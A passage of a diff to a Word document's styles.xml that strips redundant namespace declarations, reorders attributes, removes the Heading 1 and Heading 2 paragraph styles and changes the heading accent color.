+  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
-  <w:style w:type="table" w:styleId="TableNormal" w:default="1">
+  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
     <w:name w:val="Normal Table"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -2126,93 +1642,52 @@
       </w:tblCellMar>
     </w:tblPr>
   </w:style>
-  <w:style w:type="numbering" w:styleId="NoList" w:default="1">
+  <w:style w:type="numbering" w:default="1" w:styleId="NoList">
     <w:name w:val="No List"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
-  <w:style xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:type="character" w:styleId="Heading1Char" w:customStyle="1" mc:Ignorable="w14">
-    <w:name xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Heading 1 Char"/>
-    <w:basedOn xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="DefaultParagraphFont"/>
-    <w:link xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Heading1"/>
-    <w:uiPriority xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="9"/>
-    <w:rPr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
-      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
+    <w:name w:val="Heading 1 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading1"/>
+    <w:uiPriority w:val="9"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
       <w:sz w:val="32"/>
       <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
-  <w:style xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:type="paragraph" w:styleId="Heading1" mc:Ignorable="w14">
-    <w:name xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="heading 1"/>
-    <w:basedOn xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Normal"/>
-    <w:next xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Normal"/>
-    <w:link xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Heading1Char"/>
-    <w:uiPriority xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="9"/>
-    <w:qFormat xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>
-    <w:pPr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-      <w:keepNext xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>
-      <w:keepLines xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>
-      <w:spacing xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:before="240" w:after="0"/>
-      <w:outlineLvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="0"/>
-    </w:pPr>
-    <w:rPr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
-      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
-      <w:sz w:val="32"/>
-      <w:szCs w:val="32"/>
-    </w:rPr>
-  </w:style>
-  <w:style xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:type="paragraph" w:styleId="ListParagraph" mc:Ignorable="w14">
-    <w:name xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="List Paragraph"/>
-    <w:basedOn xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Normal"/>
-    <w:uiPriority xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="34"/>
-    <w:qFormat xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>
-    <w:pPr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-      <w:ind xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:left="720"/>
-      <w:contextualSpacing xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>
+  <w:style w:type="paragraph" w:styleId="ListParagraph">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
     </w:pPr>
   </w:style>
-  <w:style xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:type="character" w:styleId="Hyperlink" mc:Ignorable="w14">
-    <w:name xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Hyperlink"/>
-    <w:basedOn xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="DefaultParagraphFont"/>
-    <w:uiPriority xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="99"/>
-    <w:unhideWhenUsed xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>
-    <w:rPr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rPr>
       <w:color w:val="0563C1" w:themeColor="hyperlink"/>
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:type="character" w:styleId="Heading2Char" w:customStyle="1" mc:Ignorable="w14">
-    <w:name xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Heading 2 Char"/>
-    <w:basedOn xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="DefaultParagraphFont"/>
-    <w:link xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Heading2"/>
-    <w:uiPriority xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="9"/>
-    <w:rPr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
-      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
-      <w:sz w:val="26"/>
-      <w:szCs w:val="26"/>
-    </w:rPr>
-  </w:style>
-  <w:style xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:type="paragraph" w:styleId="Heading2" mc:Ignorable="w14">
-    <w:name xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="heading 2"/>
-    <w:basedOn xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Normal"/>
-    <w:next xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Normal"/>
-    <w:link xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Heading2Char"/>
-    <w:uiPriority xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="9"/>
-    <w:unhideWhenUsed xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>
-    <w:qFormat xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>
-    <w:pPr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-      <w:keepNext xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>
-      <w:keepLines xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>
-      <w:spacing xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:before="40" w:after="0"/>
-      <w:outlineLvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="1"/>
-    </w:pPr>
-    <w:rPr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
-      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
+    <w:name w:val="Heading 2 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading2"/>
+    <w:uiPriority w:val="9"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
       <w:sz w:val="26"/>
       <w:szCs w:val="26"/>
     </w:rPr>
